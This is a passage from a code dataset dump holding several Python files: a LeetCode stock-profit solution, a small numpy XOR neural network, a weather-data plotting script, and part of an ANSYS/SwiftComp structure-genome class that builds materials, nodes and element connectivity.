class_str == self.match_str\n\n elif self.match_type == MATCH_CONTAINS:\n return self.match_str in class_str\n\n elif self.match_type == MATCH_START:\n return class_str.startswith(self.match_str)\n\n elif self.match_type == MATCH_END:\n return class_str.endswith(self.match_str)\n\n elif self.match_type == MATCH_REGEXP:\n m = re.search(self.match_str, class_str)\n if m:\n return True\n else:\n return False\n\n","repo_name":"mfitzp/mplstyler","sub_path":"mplstyler/styles.py","file_name":"styles.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17044456704","text":"class Solution(object):\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n \n left = 0 # buy\n right = 1 # sell\n profit = 0\n\n while right < len(prices):\n if prices[left] < prices[right]:\n currentProfit = prices[right] - prices[left] # = 4 - 1 = 3\n if currentProfit > profit:\n profit = currentProfit\n else:\n left = right\n right += 1\n return profit\n ","repo_name":"ZakariaBrahimi/Leetcode-challenges-Solutions","sub_path":"121-best-time-to-buy-and-sell-stock/121-best-time-to-buy-and-sell-stock.py","file_name":"121-best-time-to-buy-and-sell-stock.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3993214228","text":"import numpy as np\n\ndef sigmoid(x):\n return (1 / (1 + np.exp(-x)))\n\ndef dSigmoid(x):\n return x * (1 - x)\n\nclass Network:\n def __init__(self, x, y):\n self.x = x\n self.weights1 = np.random.rand(self.x.shape[1], 4)\n self.weights2 = np.random.rand(4, 1)\n self.y = y\n self.output = np.zeros(self.y.shape)\n\n def feedforward(self):\n self.layer1 = sigmoid(np.dot(self.x, self.weights1))\n self.output = sigmoid(np.dot(self.layer1, self.weights2))\n\n def backprop(self):\n weights2_change = np.dot(self.layer1.T, (2 * (self.y - self.output)) * dSigmoid(self.output))\n weights1_change = np.dot(self.x.T, (np.dot((2 * (self.y - self.output) * dSigmoid(self.output)), self.weights2.T) * dSigmoid(self.layer1)))\n\n self.weights2 += weights2_change\n self.weights1 += weights1_change\n\nX = np.array([[0, 0, 1], [0, 1, 1], [1, 0, 1], [1, 1, 1]])\nY = np.array([[0], [1], [1], [0]])\nnetwork = Network(X, Y)\n\nfor i in range(1000):\n network.feedforward()\n network.backprop()\n\nprint(network.output)\n","repo_name":"ssudler/number-ml","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21849157244","text":"from numpy import asarray\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n\"\"\"\r\nLoad and Prepare dataset\r\n\"\"\"\r\n# Load dataset\r\ndata = pd.read_csv('data.csv')\r\n\r\n# Define y and x1, through to x9\r\ny = data['ALLSKY_SFC_PAR_TOT']\r\nx1 = data['T2M']\r\nx2 = data['PRECTOTCORR']\r\nx3 = data['WS2M']\r\nx4 = data['PS']\r\nx5 = data['RH2M']\r\nx6 = data['ALLSKY_SFC_UVA']\r\nx7 = data['ALLSKY_SFC_UVB']\r\nx8 = data['ALLSKY_SFC_UV_INDEX']\r\nx9 = data['CLRSKY_SFC_PAR_TOT']\r\n\r\n# Make plot\r\n\r\nfig, axs = plt.subplots(3, 3)\r\n\r\naxs[0, 0].plot(x1, y)\r\naxs[0, 0].set_title('T2M')\r\n\r\naxs[0, 1].plot(x2, y, 'green')\r\naxs[0, 1].set_title('PRECTOTCORR')\r\n\r\naxs[0, 2].plot(x3, y, 'red')\r\naxs[0, 2].set_title('WS2M')\r\n\r\naxs[1, 0].plot(x4, y, 'cyan')\r\naxs[1, 0].set_title('PS')\r\n\r\naxs[1, 
1].plot(x5, y, 'magenta')\r\naxs[1, 1].set_title('RH2M')\r\n\r\naxs[1, 2].plot(x6, y, 'yellow')\r\naxs[1, 2].set_title('ALLSKY_SFC_UVA')\r\n\r\naxs[2, 0].plot(x7, y, 'black')\r\naxs[2, 0].set_title('ALLSKY_SFC_UVB')\r\n\r\naxs[2, 1].plot(x8, y)\r\naxs[2, 1].set_title('ALLSKY_SFC_UV_INDEX')\r\n\r\naxs[2, 2].plot(x9, y, 'green')\r\naxs[2, 2].set_title('CLRSKY_SFC_PAR_TOT')\r\n\r\n\r\nfor ax in axs.flat:\r\n ax.set(ylabel='ALLSKY_SFC_PAR_TOT')\r\n\r\n# Hide x labels and tick labels for top plots and\r\n# y ticks for right plots.\r\nfor ax in axs.flat:\r\n ax.label_outer()\r\n\r\n\r\nplt.show()\r\n\r\n\r\n# Some refs\r\n# https://matplotlib.org/stable/gallery/subplots_axes_and_figures/subplots_demo.html\r\n","repo_name":"Enowtakang/numerical-optimization-1","sub_path":"exploratory_data_analysis/linearity.py","file_name":"linearity.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17435695685","text":"import utilities\nimport ansys_materials\nimport sg_material\nimport sg_node\nimport sg_element\nimport sg_layer\n\nclass StructureGenome(object):\n '''Structure Genome class: contains all the information for a SG\n\n Attributes:\n BeamModel: Beam Model object\n PlateModel: Plate Model object\n SolidModel: Solid Model object\n analysis, elem_flag, trans_flag, temp_flag: common flag\n aperiodic: indicates whether aperiodic or not\n py1, py2, py3: value for aperiodic\n nSG, nnode, nelem, nmate, nslave, nlayer: mesh control parameters\n '''\n\n def __init__(self):\n self.BeamModel = None\n self.PlateModel = None\n self.SolidModel = None\n\n self.analysis = 0\n self.elem_flag = 0\n self.trans_flag = 0\n self.temp_flag = 0\n\n self.aperiodic = False\n self.py1 = 0\n self.py2 = 0\n self.py3 = 0\n\n self.nSG = 0\n self.nnode = 0\n self.nelem = 0\n self.nmate = 0\n self.nslave = 0\n self.nlayer = 0\n \n self.Material = None\n self.Node = None\n self.Element = None\n self.Layer = None\n self.omega = 0\n\n def setMacroModel(self, macroModel):\n if macroModel == \"Beam Model\":\n self.BeamModel = BeamModel()\n elif macroModel == \"Plate Model\":\n self.PlateModel = PlateModel()\n elif macroModel == \"Solid Model\":\n self.SolidModel = SolidModel()\n\n def setBeamModelControlParameters(self, submodel, beam_ini_curvatures, beam_ini_oblique, common_flag, aperiodic_flag): \n self.BeamModel.setBeamModel(submodel, beam_ini_curvatures, beam_ini_oblique)\n self.setCommonFlag(common_flag)\n self.setAperiodicFlag(aperiodic_flag)\n\n def setPlateModelControlParameters(self, submodel, plate_ini_curvatures, common_flag, aperiodic_flag):\n self.PlateModel.setPlateModel(submodel, plate_ini_curvatures)\n self.setCommonFlag(common_flag)\n self.setAperiodicFlag(aperiodic_flag)\n\n def setSolidModelControlParameters(self, common_flag, aperiodic_flag): \n self.setCommonFlag(common_flag)\n self.setAperiodicFlag(aperiodic_flag)\n\n def setCommonFlag(self, common_flag):\n '''Get: analysis, elem_flag, trans_flag, temp_flag'''\n\n analysis_dictionary = {'Elastic': 0, 'Thermoelastic': 1, 'Conduction': 2, \n 'Piezoelectric/Piezomagnetic': 3, 'Thermoepiezoelectric/Thermopiezomagnetic': 4,\n 'Piezoeletromagnetic': 5, 'Thermopiezoeletromagnetic': 6}\n\n elem_flag_dictionary = {'Regular Elements': 0, 'One Dimension Degenerated': 1, 'Two Dimension Degenerated': 2}\n\n trans_flag_dictionary = {'Global Coordinate System': 0, 'Element Coordinate System': 1}\n\n temp_flag_dictionary = {'Uniform': 0, 'Not-uniform': 1}\n\n self.analysis = 
analysis_dictionary[common_flag[0]]\n self.elem_flag = elem_flag_dictionary[common_flag[1]]\n self.trans_flag = trans_flag_dictionary[common_flag[2]]\n self.temp_flag = temp_flag_dictionary[common_flag[3]]\n\n def setAperiodicFlag(self, aperiodic_flag):\n '''Get: py1, py2, py3'''\n \n aperiodic_flag_dictionary = {'No': 0, 'Yes': 1}\n\n if len(aperiodic_flag) == 1:\n self.py1 = aperiodic_flag_dictionary[aperiodic_flag[0]]\n elif len(aperiodic_flag) == 2:\n self.py1 = aperiodic_flag_dictionary[aperiodic_flag[0]]\n self.py2 = aperiodic_flag_dictionary[aperiodic_flag[1]]\n elif len(aperiodic_flag) == 3:\n self.py1 = aperiodic_flag_dictionary[aperiodic_flag[0]]\n self.py2 = aperiodic_flag_dictionary[aperiodic_flag[1]]\n self.py3 = aperiodic_flag_dictionary[aperiodic_flag[2]]\n\n if self.py1 + self.py2 + self.py3 > 0:\n self.aperiodic = True\n\n\n def set1DSG(self, ExtAPI):\n self.nSG = 1\n self.Material1DSG = []\n self.Thickness1DSG = []\n self.Angle1DSG = []\n\n for x in ExtAPI.DataModel.Project.Model.Children:\n if x.Name == 'Imported Plies':\n ImportedPlies = x\n\n ACP = ImportedPlies.Children[0]\n ModelingGroup = ACP.Children[0]\n ModelingPlies = ModelingGroup.Children\n\n for ModelingPly in ModelingPlies:\n P1_ModelingPly = ModelingPly.Children[0]\n for layer in P1_ModelingPly.Children:\n self.Material1DSG.append(layer.Material)\n self.Thickness1DSG.append(float(str(layer.Thickness).split()[0]))\n self.Angle1DSG.append(float(str(layer.Angle).split()[0]))\n\n # the SwiftComp convention is from bottom to top\n self.Material1DSG = self.Material1DSG[::-1]\n self.Thickness1DSG = self.Thickness1DSG[::-1]\n self.Angle1DSG = self.Angle1DSG[::-1]\n \n self.nelem = len(self.Material1DSG)\n self.nnode = 4 * self.nelem + 1\n self.nmate = len(set(self.Material1DSG))\n self.nslave = 0\n self.nanlge = len(set(self.Angle1DSG))\n self.nlayer = self.nmate * self.nanlge\n self.omega = 1.0\n\n # node coordinate\n self.Node = []\n half_total_thickness = float(sum(self.Thickness1DSG)) / 2\n Node = sg_node.SGNode()\n Node.coordinate = [0.0, 0.0, -half_total_thickness]\n self.Node.append(Node)\n for i, thickness in enumerate(self.Thickness1DSG):\n for j in range(4):\n Node = sg_node.SGNode()\n z = sum([x for x in self.Thickness1DSG[:i]]) + float(j+1)/4 * thickness - half_total_thickness\n Node.coordinate = [0.0, 0.0, z]\n self.Node.append(Node)\n\n # layer block\n material_list = list(set(self.Material1DSG))\n angle_list = list(set(self.Angle1DSG))\n self.Layer = []\n for i in range(self.nmate):\n for j in range(self.nanlge):\n Layer = sg_layer.SGLayer()\n Layer.material_id = i + 1\n Layer.angle = angle_list[j]\n self.Layer.append(Layer)\n\n # element connectivity\n self.Element = []\n for i in range(self.nelem):\n Element = sg_element.SGElement()\n Element.total_node = 5\n Element.total_corner_node = 2\n Element.connectivity = [1 + 4*i, 5 + 4*i, 2 + 4*i, 4 + 4*i, 3 + 4*i]\n for j, Layer in enumerate(self.Layer):\n if material_list[Layer.material_id-1] == self.Material1DSG[i] and Layer.angle == self.Angle1DSG[i]:\n Element.layer_id = j + 1\n break\n self.Element.append(Element)\n\n # material connectivity\n materials = ExtAPI.DataModel.Project.EngineeringDataLibrary.GetMaterials()\n materials_name_list = [mat.DisplayName for mat in materials]\n self.Material = []\n for i in range(self.nmate):\n material = materials[materials_name_list.index(material_list[i])]\n property_names = ansys_materials.GetListMaterialProperties(material)\n ntemp = 1; T = [0.0]; density = [0.0]\n\n density_dictionary = 
ansys_materials.GetMaterialPropertyByName(material, \"Density\")\n if density_dictionary:\n density_list = density_dictionary.get('Density')\n temperature_list = density_dictionary.get('Temperature') \n if temperature_list: # there is Temperature key\n ntemp = len(temperature_list) - 1\n T = temperature_list[1:ntemp+1]\n density = density_list[1:ntemp+1]\n\n elastic_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Elasticity\")\n if elastic_dictionary:\n # isotropic\n if \"Young's Modulus\" in elastic_dictionary:\n isotropy = 0\n E = elastic_dictionary[\"Young's Modulus\"][1:ntemp+1]\n nu = elastic_dictionary[\"Poisson's Ratio\"][1:ntemp+1]\n elif \"Young's Modulus X direction\" in elastic_dictionary: # orthotropic\n isotropy = 1\n E1 = elastic_dictionary[\"Young's Modulus X direction\"][1:ntemp+1]\n E2 = elastic_dictionary[\"Young's Modulus Y direction\"][1:ntemp+1]\n E3 = elastic_dictionary[\"Young's Modulus Z direction\"][1:ntemp+1]\n G12 = elastic_dictionary[\"Shear Modulus XY\"][1:ntemp+1]\n G13 = elastic_dictionary[\"Shear Modulus XZ\"][1:ntemp+1]\n G23 = elastic_dictionary[\"Shear Modulus YZ\"][1:ntemp+1]\n nu12 = elastic_dictionary[\"Poisson's Ratio XY\"][1:ntemp+1]\n nu13 = elastic_dictionary[\"Poisson's Ratio XZ\"][1:ntemp+1]\n nu23 = elastic_dictionary[\"Poisson's Ratio YZ\"][1:ntemp+1]\n elif 'D[*,1]' in elastic_dictionary: # anisotropic\n isotropy = 2\n column1 = elastic_dictionary[\"D[*,1]\"][1:]\n column2 = elastic_dictionary[\"D[*,2]\"][1:]; column2[0] = column1[1]\n column3 = elastic_dictionary[\"D[*,3]\"][1:]; column3[0] = column1[2]; column3[1] = column2[2]\n column4 = elastic_dictionary[\"D[*,4]\"][1:]; column4[0] = column1[3]; column4[1] = column2[3]; column4[2] = column3[3]\n column5 = elastic_dictionary[\"D[*,5]\"][1:]; column5[0] = column1[4]; column5[1] = column2[4]; column5[2] = column3[4]; column5[3] = column4[4]\n column6 = elastic_dictionary[\"D[*,6]\"][1:]; column6[0] = column1[5]; column6[1] = column2[5]; column6[2] = column3[5]; column6[3] = column4[5]; column6[4] = column5[5]\n D = []\n for k in range(6):\n row = [[column1[k], column2[k], column3[k], column4[k], column5[k], column6[k]]]\n D += row\n C = D\n C[3], C[4] = C[4], C[3]\n C[4], C[5] = C[5], C[4]\n C = utilities.transpose(C)\n C[4], C[5] = C[5], C[4]\n C[3], C[4] = C[4], C[3]\n C = utilities.transpose(C)\n\n Material = sg_material.SGMaterial(isotropy, ntemp, 1)\n Material.name = material_list[i]\n if isotropy == 0:\n Material.setIsotropicMaterialProperty(ntemp, T, density, E, nu)\n elif isotropy == 1:\n Material.setOrthotropicMaterialProperty(ntemp, T, density, E1, E2, E3, G12, G13, G23, nu12, nu13, nu23)\n elif isotropy == 2:\n Material.setAnisotropicMaterialProperty(ntemp, T, density, C)\n\n self.Material.append(Material)\n \n\n def setMaterial(self, ExtAPI):\n ''' set Material attribute'''\n\n self.Material = []\n \n # total number of parts\n part_total = ExtAPI.DataModel.GeoData.Assemblies[0].Parts.Count\n\n for part in range(part_total):\n\n # total number of bodies for current part\n body_total = ExtAPI.DataModel.GeoData.Assemblies[0].Parts[part].Bodies.Count\n\n for body in range(body_total):\n\n # body id for this body\n body_id = ExtAPI.DataModel.GeoData.Assemblies[0].Parts[part].Bodies[body].Id\n\n # material object for this body (Ansys.EngineeringData.Material.MaterialClass)\n material = ExtAPI.DataModel.GeoData.Assemblies[0].Parts[part].Bodies[body].Material\n\n # list of material property names for this body\n # possible names are:\n # Isotropic (Structural Steel):\n 
# ['Appearance', 'Compressive Ultimate Strength', 'Compressive Yield Strength', 'Density', 'Tensile Yield Strength', \n # 'Tensile Ultimate Strength', 'Coefficient of Thermal Expansion', 'Specific Heat', 'Thermal Conductivity', 'S-N Curve', \n # 'Strain-Life Parameters', 'Resistivity', 'Elasticity', 'Relative Permeability', 'Field Variable']\n # Orthotropic (\n # ['Density', 'Ply Type', 'Elasticity', 'Strain Limits', 'Stress Limits', 'Coefficient of Thermal Expansion',\n # 'Puck Constants', 'Additional Puck Constants', 'Tsai-Wu Constants', 'Appearance']\n property_names = ansys_materials.GetListMaterialProperties(material)\n\n ntemp = 1; T = [0.0]; density = [0.0]\n\n if 'Density' in property_names:\n\n # Obtain density dictionary\n # Examples: \n # {'Density': ['kg m^-3', 1160]}\n # {'Density': ['kg m^-3', 7850, 23], 'Temperature': ['C', 1, 2]} \n density_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Density\")\n\n density_list = density_dictionary.get('Density')\n\n temperature_list = density_dictionary.get('Temperature') \n\n if temperature_list: # there is Temperature key\n ntemp = len(temperature_list) - 1\n T = temperature_list[1:ntemp+1]\n density = density_list[1:ntemp+1]\n \n if \"Elasticity\" in property_names:\n\n # Obtain Elasticity dictionary\n # Examples: \n # isotropic: {'Poisson's Ratio': ['', 0.35], 'Bulk Modulus': ['Pa', 4200000000], 'Young's Modulus': ['Pa', 3780000000], 'Shear Modulus': ['Pa', 1400000000]}\n # isotropic: {'Shear Modulus': ['Pa', 10.4545454545455, 76923076923.0769], 'Bulk Modulus': ['Pa', 9.58333333333333, 166666666666.667], \n # 'Poisson's Ratio': ['', 0.1, 0.3], 'Temperature': ['C', 1, 2], 'Young's Modulus': ['Pa', 23, 200000000000]}\n # orthotropic: {'Poisson's Ratio YZ': ['', 0.3], 'Young's Modulus Z direction': ['Pa', 9000000000], 'Poisson's Ratio XZ': ['', 0.3], 'Young's Modulus Y direction':\n # ['Pa', 91820000000], 'Young's Modulus X direction': ['Pa', 91820000000], 'Shear Modulus XY': ['Pa', 19500000000], 'Shear Modulus YZ': ['Pa', 3000000000], \n # 'Shear Modulus XZ': ['Pa', 3000000000], 'Poisson's Ratio XY': ['', 0.05]}\n # anisotropic: {'D[*,3]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 166000000000, 0, 0, 0], \n # 'D[*,2]': ['Pa', 7.88860905221012E-31, 166000000000, 64000000000, 0, 0, 0], \n # 'D[*,1]': ['Pa', 166000000000, 64000000000, 64000000000, 0, 0, 0], \n # 'D[*,6]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 80000000000], \n # 'D[*,5]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 80000000000, 0], \n # 'D[*,4]': ['Pa', 7.88860905221012E-31, 7.88860905221012E-31, 7.88860905221012E-31, 80000000000, 0, 0]}\n elastic_dictionary = ansys_materials.GetMaterialPropertyByName(material, \"Elasticity\")\n\n # isotropic\n if \"Young's Modulus\" in elastic_dictionary:\n isotropy = 0\n E = elastic_dictionary[\"Young's Modulus\"][1:ntemp+1]\n nu = elastic_dictionary[\"Poisson's Ratio\"][1:ntemp+1]\n elif \"Young's Modulus X direction\" in elastic_dictionary: # orthotropic\n isotropy = 1\n E1 = elastic_dictionary[\"Young's Modulus X direction\"][1:ntemp+1]\n E2 = elastic_dictionary[\"Young's Modulus Y direction\"][1:ntemp+1]\n E3 = elastic_dictionary[\"Young's Modulus Z direction\"][1:ntemp+1]\n G12 = elastic_dictionary[\"Shear Modulus XY\"][1:ntemp+1]\n G13 = elastic_dictionary[\"Shear Modulus XZ\"][1:ntemp+1]\n G23 = elastic_dictionary[\"Shear Modulus YZ\"][1:ntemp+1]\n nu12 = 
elastic_dictionary[\"Poisson's Ratio XY\"][1:ntemp+1]\n nu13 = elastic_dictionary[\"Poisson's Ratio XZ\"][1:ntemp+1]\n nu23 = elastic_dictionary[\"Poisson's Ratio YZ\"][1:ntemp+1]\n elif 'D[*,1]' in elastic_dictionary: # anisotropic\n isotropy = 2\n # In ANSYS, it has\n # 'D[*,1]' = [D11, D21, D31, D41, D51, D61]\n # 'D[*,2]' = [D22, D32, D42, D52, D62]\n # 'D[*,3]' = [D33, D43, D53, D63]\n # 'D[*,4]' = [D44, D54, D64]\n # 'D[*,5]' = [D55, D65]\n # 'D[*,6]' = [D66\n # so the columns are:\n # column1 = [D11, D21, D31, D41, D51, D61]\n # column2 = [D12, D22, D32, D42, D52, D62]\n # column3 = [D13, D23, D33, D43, D53, D63]\n # column4 = [D41, D42, D43, D44, D54, D64]\n # column5 = [D51, D52, D53, D54, D55, D65]\n # column6 = [D61, D62, D63, D64, D65, D66]\n column1 = elastic_dictionary[\"D[*,1]\"][1:]\n column2 = elastic_dictionary[\"D[*,2]\"][1:]; column2[0] = column1[1]\n column3 = elastic_dictionary[\"D[*,3]\"][1:]; column3[0] = column1[2]; column3[1] = column2[2]\n column4 = elastic_dictionary[\"D[*,4]\"][1:]; column4[0] = column1[3]; column4[1] = column2[3]; column4[2] = column3[3]\n column5 = elastic_dictionary[\"D[*,5]\"][1:]; column5[0] = column1[4]; column5[1] = column2[4]; column5[2] = column3[4]; column5[3] = column4[4]\n column6 = elastic_dictionary[\"D[*,6]\"][1:]; column6[0] = column1[5]; column6[1] = column2[5]; column6[2] = column3[5]; column6[3] = column4[5]; column6[4] = column5[5]\n\n # now matrix [D] become:\n # D11 D21 D31 D41 D51 D61\n # D21 D22 D32 D42 D52 D62\n # D31 D32 D33 D43 D53 D63\n # D41 D42 D43 D44 D54 D64\n # D51 D52 D53 D54 D55 D65\n # D61 D62 D63 D64 D65 D66\n D = []\n for k in range(6):\n row = [[column1[k], column2[k], column3[k], column4[k], column5[k], column6[k]]]\n D += row\n\n # The engineering notation in ANSYS is 11, 22, 33, 12, 23, 13\n # We need to change it to be 11, 22, 33, 23, 13, 12 for SwiftComp\n C = D\n\n C[3], C[4] = C[4], C[3]\n C[4], C[5] = C[5], C[4]\n C = utilities.transpose(C)\n C[4], C[5] = C[5], C[4]\n C[3], C[4] = C[4], C[3]\n C = utilities.transpose(C)\n\n\n tensile_ultimate_strength_dictionary = {}\n if 'Tensile Ultimate Strength' in property_names:\n # Obtain Tensile Ultimate Strength\n # Examples: \n # {'Tensile Ultimate Strength': ['Pa', 460000000]}\n tensile_ultimate_strength_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Tensile Ultimate Strength')\n\n Compressive_ultimate_strength_dictionary = {}\n if 'Compressive Ultimate Strength' in property_names:\n # Obtain Compressive Ultimate Strength\n # Examples: \n # {'Compressive Ultimate Strength': ['Pa', 0]}\n Compressive_ultimate_strength_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Compressive Ultimate Strength')\n\n stress_limits_dictionary = {}\n if 'Stress Limits' in property_names:\n # Obtain Stress Limits\n # Examples: \n # {'Tensile Z direction': ['Pa', 29000000], 'Compressive X direction': ['Pa', -1082000000], 'Shear YZ': ['Pa', 32000000], \n # 'Tensile X direction': ['Pa', 2231000000], 'Shear XZ': ['Pa', 60000000], 'Compressive Y direction': ['Pa', -100000000], \n # 'Shear XY': ['Pa', 60000000], 'Tensile Y direction': ['Pa', 29000000], 'Compressive Z direction': ['Pa', -100000000]}\n stress_limits_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Stress Limits')\n\n strain_limits_dictionary = {}\n if 'Strain Limits' in property_names:\n # Obtain Strain Limits\n # Examples: \n # {'Tensile Z direction': ['', 0.0032], 'Compressive X direction': ['', -0.0108], 'Shear YZ': ['', 0.011], \n # 'Tensile X direction': ['', 
0.0167], 'Shear XZ': ['', 0.012], 'Compressive Y direction': ['', -0.0192], \n # 'Shear XY': ['', 0.012], 'Tensile Y direction': ['', 0.0032], 'Compressive Z direction': ['', -0.0192]}\n strain_limits_dictionary = ansys_materials.GetMaterialPropertyByName(material, 'Strain Limits')\n\n # create SGMaterial instance\n Material = sg_material.SGMaterial(isotropy, ntemp, body_id)\n Material.name = material.DisplayName\n if isotropy == 0:\n Material.setIsotropicMaterialProperty(ntemp, T, density, E, nu)\n elif isotropy == 1:\n Material.setOrthotropicMaterialProperty(ntemp, T, density, E1, E2, E3, G12, G13, G23, nu12, nu13, nu23)\n elif isotropy == 2:\n Material.setAnisotropicMaterialProperty(ntemp, T, density, C)\n\n # set Tensile Ultimate Strength if any\n if tensile_ultimate_strength_dictionary:\n tensileUltimateStrength = tensile_ultimate_strength_dictionary['Tensile Ultimate Strength'][1]\n Material.setTensileUltimateStrength(ntemp, tensileUltimateStrength)\n\n # set Compressive Ultimate Strength if any\n if Compressive_ultimate_strength_dictionary:\n compressiveUltimateStrength = Compressive_ultimate_strength_dictionary['Compressive Ultimate Strength'][1]\n Material.setCompressiveUltimateStrength(ntemp, compressiveUltimateStrength)\n\n # set Stress Limitsh if any\n if stress_limits_dictionary:\n X_t = stress_limits_dictionary['Tensile X direction'][1]\n Y_t = stress_limits_dictionary['Tensile Y direction'][1]\n Z_t = stress_limits_dictionary['Tensile Z direction'][1]\n X_c = stress_limits_dictionary['Compressive X direction'][1]\n Y_c = stress_limits_dictionary['Compressive Y direction'][1]\n Z_c = stress_limits_dictionary['Compressive Z direction'][1]\n R = stress_limits_dictionary['Shear YZ'][1]\n T = stress_limits_dictionary['Shear XZ'][1]\n S = stress_limits_dictionary['Shear XY'][1] \n Material.setOrthotropicStressLimits(ntemp, X_t, Y_t, Z_t, X_c, Y_c, Z_c, R, T, S)\n\n # set Strain Limits if any\n if strain_limits_dictionary:\n Xe_t = strain_limits_dictionary['Tensile X direction'][1]\n Ye_t = strain_limits_dictionary['Tensile Y direction'][1]\n Ze_t = strain_limits_dictionary['Tensile Z direction'][1]\n Xe_c = strain_limits_dictionary['Compressive X direction'][1]\n Ye_c = strain_limits_dictionary['Compressive Y direction'][1]\n Ze_c = strain_limits_dictionary['Compressive Z direction'][1]\n Re = strain_limits_dictionary['Shear YZ'][1]\n Te = strain_limits_dictionary['Shear XZ'][1]\n Se = strain_limits_dictionary['Shear XY'][1] \n Material.setOrthotropicStrainLimits(ntemp, Xe_t, Ye_t, Ze_t, Xe_c, Ye_c, Ze_c, Re, Te, Se)\n\n # check whether this material is a new material or not\n mark = 0\n for MaterialTemp in self.Material:\n if Material == MaterialTemp:\n mark = 1 # mark = 1 means this material is not new\n break\n if mark == 0: # mark = 0 means this material is new. add it to Material list property\n self.Material.append(Material)\n\n def setMeshControlParameters(self, ExtAPI):\n '''set nSG, nnode, nelem, nmate, nslave, nlayer'''\n # Check one element to determine nSG. 
(One element is enough)\n # 1D element -> nSG = 1\n # 2D element -> nSG = 2\n # 3D element -> nSG = 3\n self.nSG = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.ElementById(1).Dimension\n self.nnode = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.Nodes.Count\n self.nelem = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.Elements.Count\n self.nmate = len(self.Material)\n self.nslave = 0\n self.nlayer = 0\n\n def setNodaCoordinate(self, ExtAPI):\n '''set nodal coordinates'''\n self.Node = []\n for i in range(self.nnode):\n Node = sg_node.SGNode()\n x = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeById(i+1).X\n y = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeById(i+1).Y\n z = ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeById(i+1).Z\n Node.coordinate = [x, y, z]\n self.Node.append(Node)\n\n def setElementConnectivity(self, ExtAPI):\n '''\n ================================================================\n Element connectivity in SwiftComp\n ---------------------------------\n Linear triangular element: kTri3\n connectivity = [1, 2, 3, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic triangular element: kTri6\n connectivity = [1, 2, 3, 0, 4, 5, 6, 0, 0]\n ---------------------------------\n Linear quadrilateral element: kQuad4\n connectivity = [1, 2, 3, 4, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic quadrilateral element: kQuad8\n connectivity = [1, 2, 3, 4, 5, 6, 7, 8, 0]\n ---------------------------------\n Linear tetrahedral element: kTet4\n connectivity = [1, 2, 3, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic tetrahedral element: kTet10\n connectivity = [1, 2, 3, 4, 0, 5, 6, 7, 8, 9, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Linear brick element: kHex8\n connectivity = [1, 2, 3, 4, 5, 6, 7, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n ---------------------------------\n Quadratic brick element: kHex20\n connectivity = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n ================================================================\n '''\n self.Element = []\n if self.nSG == 2:\n for i in range(self.nelem):\n Element = sg_element.SGElement()\n connectivity = list(ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeIdsFromElementIds([i+1]))\n if len(connectivity) == 3: # Linear triangular element: kTri3\n Element.elementType = 'kTri3'\n Element.total_node = 3\n Element.total_corner_node = 3\n Element.connectivity = connectivity + [0] * 6\n elif len(connectivity) == 6: # Quadratic triangular element: kTri6\n Element.elementType = 'kTri6'\n Element.total_node = 6\n Element.total_corner_node = 3\n Element.connectivity = connectivity[0:3] + [0] + connectivity[3:6] + [0] * 2\n elif len(connectivity) == 4: # Linear quadrilateral element: kQuad4\n Element.elementType = 'kQuad4'\n Element.total_node = 4\n Element.total_corner_node = 4\n Element.connectivity = connectivity + [0] * 5\n elif len(connectivity) == 8: # Quadratic quadrilateral element: kQuad8\n Element.elementType = 'kQuad8'\n Element.total_node = 8\n Element.total_corner_node = 4\n Element.connectivity = connectivity + [0]\n else:\n utilities.element2DTypeWrongMessage()\n raise EOFError\n self.Element = self.Element + [Element]\n elif self.nSG == 3:\n for i in range(self.nelem):\n Element = sg_element.SGElement()\n connectivity = list(ExtAPI.DataModel.Project.Model.Analyses[0].MeshData.NodeIdsFromElementIds([i+1]))\n if len(connectivity) == 4: # 
